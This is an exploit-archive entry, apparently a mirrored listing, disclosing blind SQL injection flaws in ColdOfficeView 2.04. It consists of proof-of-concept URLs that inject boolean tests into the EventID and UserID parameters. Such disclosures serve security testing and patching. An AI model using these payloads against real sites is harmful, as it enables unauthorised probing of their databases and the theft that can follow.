[] NeoSense
E X P L O I T S
title author type platform port cve id

ColdOfficeView 2.04 - Multiple Blind SQL Injections

Author: mr_me
type: webapps
platform: windows
port: 
date_added: 2010-09-07 
date_updated: 2010-09-07 
verified: 1 
codes: OSVDB-67877 
tags: 
aliases:  
screenshot_url:  
application_url: 
# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)

PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.